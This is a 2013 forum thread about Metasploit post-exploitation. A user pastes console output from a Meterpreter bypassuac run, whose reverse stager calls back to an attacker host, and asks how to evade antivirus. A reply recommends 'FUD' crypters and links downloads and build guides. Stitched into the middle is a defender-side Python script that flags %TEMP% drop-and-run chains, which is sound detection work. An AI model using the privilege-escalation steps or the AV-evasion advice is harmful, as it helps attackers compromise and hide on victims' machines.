SystemCrash86 Posted March 20, 2013

I was using SET and I can get a meterpreter session easily on my desktop running Windows 7 with up-to-date Microsoft Security Essentials, thanks to the new and improved multi PowerShell attack on multiple ports. When I go to the cloned webpage I get the Java applet like normal and I am not notified by my antivirus that there is a problem. Great. If I understand correctly it goes straight into memory, never touching disk, right?

Now once I have a meterpreter session the next thing I try to do is escalate my privileges, and running "get system" does not work, so I use the script that Dave Kennedy and Kevin Mitnick made to bypass UAC, but whenever I do it is automatically caught by my antivirus. How is it possible to get this to work? I already have a meterpreter session. I try to search on Google for an answer and all I get is videos of bypassuac tutorials, all of which work flawlessly, so I can't explain why my antivirus catches it when I can get a meterpreter session.

When I get a meterpreter session and run bypassuac, this is what I get on my desktop PC; Microsoft Security Essentials detects it:

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > run bypassuac
[*] Creating a reverse meterpreter stager: LHOST=192.168.1.71 LPORT=4546
[*] Running payload handler
[*] Uploading Windows UACBypass to victim machine.
[*] Bypassing UAC Restrictions on the system....
[*] Meterpreter stager executable 73802 bytes long
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint 192.168.1.71:4546 with UACBypass in effect...
[*] C:\Users\CHRIST~1\AppData\Local\Temp\wHOFsw.exe /c %TEMP%\FJElQacDvdzS.exe
meterpreter > use post/windows/escalate/bypassuac
Loading extension post/windows/escalate/bypassuac...
[-] Failed to load extension: No such file or directory -/opt/metasploit/msf3/data/meterpreter/ext_server_post/windows/escalate/bypassuac.dll
meterpreter >

I emailed Dave Kennedy and this is what he told me I have to do:

"You need to obfuscate the executables that it drops. They are in the Metasploit repositories and are dll's. Just need to randomize / pack / crypt them to get around AV.."

However I am not sure which files he means; I have tried looking but so far I have been unable to locate them. Dave says I should be looking for dll's in the Metasploit repositories, but I looked and can't find them, and I'm not even sure if they are the right ones. I am using Backtrack 5r3 (haven't made the switch to Kali yet).

I am very confused and I am hoping that you guys could take the time to help me. All help is greatly appreciated. Since Dave is a very busy man working extremely hard, I wouldn't want to waste his time; that's why I am posting this on the forums to see if anyone can help.
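The transcript above also shows, from the defender's side, why the in-memory stage went unnoticed while the bypassuac script did not: the script writes a stager executable and an agent into the victim's %TEMP% and then runs one from the other, an on-disk parent/child pattern that endpoint telemetry can flag regardless of what the bytes look like. The checker below is an added example, not code from this thread, from SET or from Metasploit. It scans process-creation records for that pattern; the Sysmon-style field names, the benign records and the scripting-host list are constructed for the example, and only the first command line is taken from the transcript.

```python
import re

# Constructed process-creation records with Sysmon-style field names (image,
# command_line, parent_image). The first record reproduces the command line
# from the thread's transcript; the other two are made up as benign/borderline input.
SAMPLE_EVENTS = [
    {
        "image": r"C:\Users\CHRIST~1\AppData\Local\Temp\wHOFsw.exe",
        "command_line": r"C:\Users\CHRIST~1\AppData\Local\Temp\wHOFsw.exe /c %TEMP%\FJElQacDvdzS.exe",
        "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": r"notepad.exe C:\Users\alice\notes.txt",
        "parent_image": r"C:\Windows\explorer.exe",
    },
    {
        # An installer started from a browser download: runs from Temp, but
        # does not chain into a second Temp-resident binary.
        "image": r"C:\Users\alice\AppData\Local\Temp\setup_12345.exe",
        "command_line": r"C:\Users\alice\AppData\Local\Temp\setup_12345.exe /silent",
        "parent_image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
    },
]

# A per-user Temp directory, either as an expanded path or as the %TEMP%/%TMP% variable.
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
TEMP_VAR_RE = re.compile(r"%TE?MP%", re.IGNORECASE)

# Assumed list of script hosts whose child executables deserve a closer look.
SCRIPT_HOSTS = ("powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def in_temp(path):
    """True when the path points into a user's AppData\\Local\\Temp directory."""
    return bool(TEMP_DIR_RE.search(path))


def assess(event):
    """Return (severity, reasons) for one process-creation record.

    high   - a Temp-resident image whose command line references a second
             Temp-resident executable (the drop-and-run chain from the transcript)
    medium - an image that merely runs from Temp
    none   - nothing Temp-related
    """
    reasons = []
    image_in_temp = in_temp(event["image"])
    if image_in_temp:
        reasons.append("image runs from a user Temp directory")

    cmd = event["command_line"]
    # Count every Temp reference on the command line: the image itself plus any
    # argument that points back into Temp (expanded or via %TEMP%).
    temp_refs = len(TEMP_DIR_RE.findall(cmd)) + len(TEMP_VAR_RE.findall(cmd))
    chain = image_in_temp and temp_refs >= 2
    if chain:
        reasons.append("Temp-resident process launches another Temp-resident executable")

    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent in SCRIPT_HOSTS:
        reasons.append(f"parent is a scripting host ({parent})")

    severity = "high" if chain else ("medium" if image_in_temp else "none")
    return severity, reasons


def triage(events):
    """Return (image, severity, reasons) for every record that is not 'none'."""
    findings = []
    for event in events:
        severity, reasons = assess(event)
        if severity != "none":
            findings.append((event["image"], severity, reasons))
    return findings


if __name__ == "__main__":
    for image, severity, reasons in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {image}")
        for reason in reasons:
            print(f"    - {reason}")
```

The severity split matters in practice: plenty of legitimate installers run from Temp, so "runs from Temp" alone is only a medium signal, while a Temp-resident binary that immediately launches a second Temp-resident binary is rare outside droppers and is worth alerting on by itself. The parent field is reported as context rather than folded into the severity, because the thread's first stage arrived through PowerShell but other delivery paths would show a different parent.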
ApacheTech Consultancy Posted March 20, 2013 (edited)

He means you need to make the applications FUD (Fully Undetectable) by crypting them. Usually this means creating a self-expanding "stub" and wrapping the rest of the file bytes around it. There are thousands of crypters available on the internet. Some you pay for, others don't work.

Here is an example: http://thehackersarmy.blogspot.co.uk/2012/01/fud-crypter-free-download-bypass.html

There's also a guide on how to build them yourself here: http://www.cryptersource.com/

Edited March 20, 2013 by ApacheTech Consultancy
SystemCrash86 (Author) Posted March 20, 2013 (edited)

> He means you need to make the applications FUD (Fully Undetectable) by crypting them. Usually this means creating a self-expanding "stub" and wrapping the rest of the file bytes around it. There are thousands of crypters available on the internet. Some you pay for, others don't work.
>
> Here is an example: http://thehackersarmy.blogspot.co.uk/2012/01/fud-crypter-free-download-bypass.html
>
> There's also a guide on how to build them yourself here: http://www.cryptersource.com/

Oh no, I fully understand that; I know exactly how to crypt applications as I've done that before. What I mean was: where are the files he was referring to that I need to crypt in order for meterpreter's bypassuac script to bypass antivirus, or did he want me to actually crypt the bypassuac script itself? I get a meterpreter session, but when using bypassuac to escalate my privileges the bypassuac script keeps getting detected by my antivirus.

Edited March 20, 2013 by SystemCrash86